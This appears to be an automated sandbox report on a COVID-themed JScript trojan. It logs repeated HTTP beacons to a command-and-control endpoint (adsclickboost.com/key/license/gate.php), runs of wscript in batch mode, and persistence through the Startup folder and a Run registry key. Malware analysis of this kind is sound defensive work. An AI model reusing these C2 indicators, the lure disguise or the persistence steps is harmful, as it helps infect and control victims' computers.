Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com
Source: global traffic	HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 23Host: adsclickboost.com

Source: unknown

DNS traffic detected: queries for: adsclickboost.com

Source: unknown

HTTP traffic detected: POST /key/license/gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Accept-Language: en-usUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63Content-Length: 20Host: adsclickboost.com

Source: wscript.exe, 00000004.00000003.409791610.000001EFB9E34000.00000004.00000001.sdmp, wscript.exe, 00000004.00000003.269140453.000001EFB9E01000.00000004.00000001.sdmp, wscript.exe, 00000007.00000003.408789200.0000028338590000.00000004.00000001.sdmp, wscript.exe, 00000007.00000002.539332365.0000028338544000.00000004.00000001.sdmp, wscript.exe, 0000000D.00000002.511576753.00000210EAA81000.00000004.00000001.sdmp, wscript.exe, 0000000D.00000003.381608799.00000210E873B000.00000004.00000001.sdmp, wscript.exe, 0000000D.00000003.317168248.00000210EAA1D000.00000004.00000001.sdmp	String found in binary or memory: http://adsclickboost.com/
Source: wscript.exe, 00000001.00000003.416646676.000001F792695000.00000004.00000001.sdmp	String found in binary or memory: http://adsclickboost.com/1
Source: wscript.exe, 00000001.00000003.356081028.000001F792695000.00000004.00000001.sdmp	String found in binary or memory: http://adsclickboost.com/12J
Source: wscript.exe, 00000004.00000003.369629621.000001EFB9E34000.00000004.00000001.sdmp	String found in binary or memory: http://adsclickboost.com/9
Source: wscript.exe, 00000001.00000003.318917408.000001F79268C000.00000004.00000001.sdmp	String found in binary or memory: http://adsclickboost.com/9aL
Source: wscript.exe, 00000001.00000003.232143310.000001F792695000.00000004.00000001.sdmp	String found in binary or memory: http://adsclickboost.com/RJ0
Source: wscript.exe, 00000004.00000003.297771553.000001EFB9E34000.00000004.00000001.sdmp	String found in binary or memory: http://adsclickboost.com/U
Source: wscript.exe, 00000004.00000003.390681019.000001EFB9E34000.00000004.00000001.sdmp	String found in binary or memory: http://adsclickboost.com/e
Source: wscript.exe, 00000001.00000003.338715180.000001F79268C000.00000004.00000001.sdmp	String found in binary or memory: http://adsclickboost.com/er
Source: wscript.exe, 00000001.00000003.434803794.000001F79268C000.00000004.00000001.sdmp, wscript.exe, 00000004.00000003.461098244.000001EFB9E3D000.00000004.00000001.sdmp, wscript.exe, 00000007.00000002.539332365.0000028338544000.00000004.00000001.sdmp	String found in binary or memory: http://adsclickboost.com/h
Source: wscript.exe, 00000004.00000003.461098244.000001EFB9E3D000.00000004.00000001.sdmp	String found in binary or memory: http://adsclickboost.com/i
Source: wscript.exe, 00000001.00000003.376049468.000001F792695000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.338793569.000001F7926C9000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.360741823.000001F791E0E000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.435333564.000001F791E0E000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.323048900.000001F791E0E000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.259095669.000001F791E0E000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.302684036.000001F792695000.00000004.00000001.sdmp, wscript.exe, 00000004.00000002.523177555.000001EFB7635000.00000004.00000040.sdmp, wscript.exe, 00000004.00000002.580871645.000001EFB9615000.00000004.00000040.sdmp, wscript.exe, 00000004.00000003.390662408.000001EFB9E27000.00000004.00000001.sdmp, wscript.exe, 00000004.00000003.478419114.000001EFB9E34000.00000004.00000001.sdmp, wscript.exe, 00000007.00000003.426945749.0000028338599000.00000004.00000001.sdmp, wscript.exe, 00000007.00000003.390596358.0000028337CCD000.00000004.00000001.sdmp, wscript.exe, 00000007.00000003.291467055.0000028337CD0000.00000004.00000001.sdmp, wscript.exe, 00000007.00000003.408789200.0000028338590000.00000004.00000001.sdmp, wscript.exe, 00000007.00000003.311074066.0000028337CD0000.00000004.00000001.sdmp, wscript.exe, 00000007.00000003.285395106.0000028337D35000.00000004.00000001.sdmp, wscript.exe, 0000000D.00000003.448723497.00000210EA490000.00000004.00000001.sdmp, wscript.exe, 0000000D.00000003.358717656.00000210EAA13000.00000004.00000001.sdmp, wscript.exe, 0000000D.00000003.466963962.00000210EAA35000.00000004.00000001.sdmp, wscript.exe, 0000000D.00000003.387548104.00000210EA483000.00000004.00000001.sdmp, wscript.exe, 0000000D.00000003.340690093.00000210EA483000.00000004.00000001.sdmp, wscript.exe, 0000000D.00000003.430918597.00000210EA483000.00000004.00000001.sdmp	String found in binary or memory: http://adsclickboost.com/key/license/gate.php
Source: wscript.exe, 0000000D.00000002.511362675.00000210EA9F5000.00000004.00000040.sdmp	String found in binary or memory: http://adsclickboost.com/key/license/gate.php&
Source: wscript.exe, 00000007.00000003.408908678.0000028338572000.00000004.00000001.sdmp	String found in binary or memory: http://adsclickboost.com/key/license/gate.php.
Source: wscript.exe, 00000001.00000003.356081028.000001F792695000.00000004.00000001.sdmp	String found in binary or memory: http://adsclickboost.com/key/license/gate.php/
Source: wscript.exe, 00000001.00000003.469238846.000001F792675000.00000004.00000001.sdmp	String found in binary or memory: http://adsclickboost.com/key/license/gate.php0DUq1z
Source: wscript.exe, 00000001.00000003.416646676.000001F792695000.00000004.00000001.sdmp	String found in binary or memory: http://adsclickboost.com/key/license/gate.php12J
Source: wscript.exe, 00000007.00000002.539288266.0000028338535000.00000004.00000040.sdmp	String found in binary or memory: http://adsclickboost.com/key/license/gate.php4
Source: wscript.exe, 0000000D.00000002.491234203.00000210E86A1000.00000004.00000020.sdmp	String found in binary or memory: http://adsclickboost.com/key/license/gate.php4d%2fID_19_Test_Result_Doctor_Note.js
Source: wscript.exe, 00000004.00000002.488743713.000001EFB7372000.00000004.00000020.sdmp, wscript.exe, 00000007.00000002.522239743.0000028336342000.00000004.00000020.sdmp	String found in binary or memory: http://adsclickboost.com/key/license/gate.php4d%2fb
Source: wscript.exe, 00000001.00000003.416757833.000001F7926AA000.00000004.00000001.sdmp	String found in binary or memory: http://adsclickboost.com/key/license/gate.php;
Source: wscript.exe, 0000000D.00000003.337246961.00000210EAA35000.00000004.00000001.sdmp, wscript.exe, 0000000D.00000003.381444898.00000210EAA35000.00000004.00000001.sdmp	String found in binary or memory: http://adsclickboost.com/key/license/gate.phpB
Source: wscript.exe, 00000004.00000003.409765695.000001EFB9E27000.00000004.00000001.sdmp	String found in binary or memory: http://adsclickboost.com/key/license/gate.phpO
Source: wscript.exe, 0000000D.00000003.358717656.00000210EAA13000.00000004.00000001.sdmp	String found in binary or memory: http://adsclickboost.com/key/license/gate.phpP
Source: wscript.exe, 0000000D.00000003.406308835.00000210EAA35000.00000004.00000001.sdmp	String found in binary or memory: http://adsclickboost.com/key/license/gate.phph
Source: wscript.exe, 0000000D.00000003.427498683.00000210EAA35000.00000004.00000001.sdmp	String found in binary or memory: http://adsclickboost.com/key/license/gate.phpv
Source: wscript.exe, 00000001.00000003.469496295.000001F792695000.00000004.00000001.sdmp, wscript.exe, 00000007.00000003.408908678.0000028338572000.00000004.00000001.sdmp	String found in binary or memory: http://adsclickboost.com/l
Source: wscript.exe, 00000001.00000003.338726572.000001F792695000.00000004.00000001.sdmp	String found in binary or memory: http://adsclickboost.com/zJH
Source: wscript.exe, 00000001.00000003.451204480.000001F7926E1000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.375631367.000001F7926E1000.00000004.00000001.sdmp, wscript.exe, 00000004.00000003.334316047.000001EFB9E34000.00000004.00000001.sdmp, wscript.exe, 00000007.00000003.426945749.0000028338599000.00000004.00000001.sdmp, wscript.exe, 0000000D.00000003.381487439.00000210EAA4F000.00000004.00000001.sdmp	String found in binary or memory: http://adsclickboost.com:80/key/license/gate.php
Source: wscript.exe, 00000001.00000003.451204480.000001F7926E1000.00000004.00000001.sdmp, wscript.exe, 00000004.00000003.409791610.000001EFB9E34000.00000004.00000001.sdmp, wscript.exe, 00000007.00000002.539332365.0000028338544000.00000004.00000001.sdmp, wscript.exe, 0000000D.00000003.337151756.00000210EAA0D000.00000004.00000001.sdmp, wscript.exe, 0000000D.00000002.511545541.00000210EAA6B000.00000004.00000001.sdmp	String found in binary or memory: http://adsclickboost.com:80/key/license/gate.phpP
Source: wscript.exe, 00000004.00000003.461256392.000001EFB9E43000.00000004.00000001.sdmp	String found in binary or memory: http://adsclickboost.com:80/key/license/gate.phpP4
Source: wscript.exe, 00000004.00000003.461256392.000001EFB9E43000.00000004.00000001.sdmp	String found in binary or memory: http://adsclickboost.com:80/key/license/gate.phpPJ
Source: wscript.exe, 0000000D.00000003.381487439.00000210EAA4F000.00000004.00000001.sdmp	String found in binary or memory: http://adsclickboost.com:80/key/license/gate.phpPW
Source: wscript.exe, 00000001.00000003.318818802.000001F7926E1000.00000004.00000001.sdmp	String found in binary or memory: http://adsclickboost.com:80/key/license/gate.phpPa
Source: wscript.exe, 00000007.00000002.539429799.000002833858B000.00000004.00000001.sdmp	String found in binary or memory: http://adsclickboost.com:80/key/license/gate.phpPcY
Source: wscript.exe, 00000004.00000003.478595101.000001EFB9E3D000.00000004.00000001.sdmp	String found in binary or memory: http://adsclickboost.com:80/key/license/gate.phpPz
Source: wscript.exe, 00000004.00000003.315088682.000001EFB9E3D000.00000004.00000001.sdmp	String found in binary or memory: http://adsclickboost.com:80/key/license/gate.phpW
Source: wscript.exe, 0000000D.00000002.511545541.00000210EAA6B000.00000004.00000001.sdmp	String found in binary or memory: http://adsclickboost.com:80/key/license/gate.phpp
Source: wscript.exe, 00000001.00000003.283704504.000001F7926E1000.00000004.00000001.sdmp	String found in binary or memory: http://adsclickboost.com:80/key/license/gate.phpw
Source: wscript.exe, 00000004.00000003.461256392.000001EFB9E43000.00000004.00000001.sdmp	String found in binary or memory: http://adsclickboost.com:80/key/license/gate.phpy
Source: wscript.exe, 00000001.00000003.434766513.000001F792675000.00000004.00000001.sdmp, wscript.exe, 0000000D.00000003.467159682.00000210EAA82000.00000004.00000001.sdmp	String found in binary or memory: https://waclickboost.com/

System Summary:

Wscript called in batch mode (surpress errors)

Show sources

Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\system32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\COVID_19_Test_Result_Doctor_Note.js'
Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\system32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\COVID_19_Test_Result_Doctor_Note.js'

Source: COVID_19_Test_Result_Doctor_Note.js

Initial sample: Strings found which are bigger than 50

Source: classification engine

Classification label: mal80.troj.evad.winJS@4/10@47/3

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\COVID_19_Test_Result_Doctor_Note.js

Jump to behavior

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\COVID_19_Test_Result_Doctor_Note.js'
Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\system32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\COVID_19_Test_Result_Doctor_Note.js'
Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\system32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\COVID_19_Test_Result_Doctor_Note.js'
Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\COVID_19_Test_Result_Doctor_Note.js'

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Source:	Binary string: scrrun.pdb source: wscript.exe, 00000001.00000002.521218312.000001F7903B0000.00000002.00000001.sdmp, wscript.exe, 00000004.00000002.523143486.000001EFB7620000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.533653925.0000028338110000.00000002.00000001.sdmp, wscript.exe, 0000000D.00000002.502717191.00000210EA580000.00000002.00000001.sdmp
Source:	Binary string: wscript.pdbGCTL source: wscript.exe, 00000001.00000002.518305380.000001F790330000.00000002.00000001.sdmp, wscript.exe, 00000004.00000002.508968648.000001EFB74E0000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.522366460.00000283363E0000.00000002.00000001.sdmp, wscript.exe, 0000000D.00000002.502466525.00000210EA350000.00000002.00000001.sdmp
Source:	Binary string: wshom.pdbUGP source: wscript.exe, 00000001.00000002.522691276.000001F7903C0000.00000002.00000001.sdmp, wscript.exe, 00000004.00000002.529022732.000001EFB8EE0000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.533682314.0000028338120000.00000002.00000001.sdmp, wscript.exe, 0000000D.00000002.502737192.00000210EA590000.00000002.00000001.sdmp
Source:	Binary string: wscript.pdb source: wscript.exe, 00000001.00000002.518305380.000001F790330000.00000002.00000001.sdmp, wscript.exe, 00000004.00000002.508968648.000001EFB74E0000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.522366460.00000283363E0000.00000002.00000001.sdmp, wscript.exe, 0000000D.00000002.502466525.00000210EA350000.00000002.00000001.sdmp
Source:	Binary string: wshom.pdb source: wscript.exe, 00000001.00000002.522691276.000001F7903C0000.00000002.00000001.sdmp, wscript.exe, 00000004.00000002.529022732.000001EFB8EE0000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.533682314.0000028338120000.00000002.00000001.sdmp, wscript.exe, 0000000D.00000002.502737192.00000210EA590000.00000002.00000001.sdmp
Source:	Binary string: scrrun.pdbUGP source: wscript.exe, 00000001.00000002.521218312.000001F7903B0000.00000002.00000001.sdmp, wscript.exe, 00000004.00000002.523143486.000001EFB7620000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.533653925.0000028338110000.00000002.00000001.sdmp, wscript.exe, 0000000D.00000002.502717191.00000210EA580000.00000002.00000001.sdmp

Data Obfuscation:

Potential obfuscated javascript found

Show sources

Source: COVID_19_Test_Result_Doctor_Note.js

Initial file: High amount of function use 25

Boot Survival:

Drops script or batch files to the startup folder

Show sources

Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\COVID_19_Test_Result_Doctor_Note.js
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\COVID_19_Test_Result_Doctor_Note.js
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\COVID_19_Test_Result_Doctor_Note.js	Jump to dropped file

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\COVID_19_Test_Result_Doctor_Note.js

Jump to behavior

Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\COVID_19_Test_Result_Doctor_Note.js	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\COVID_19_Test_Result_Doctor_Note.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\COVID_19_Test_Result_Doctor_Note.js\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\COVID_19_Test_Result_Doctor_Note.js\:Zone.Identifier:$DATA	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run COVID_19_Test_Result_Doctor_Note			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run COVID_19_Test_Result_Doctor_Note			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Source: C:\Windows\System32\wscript.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
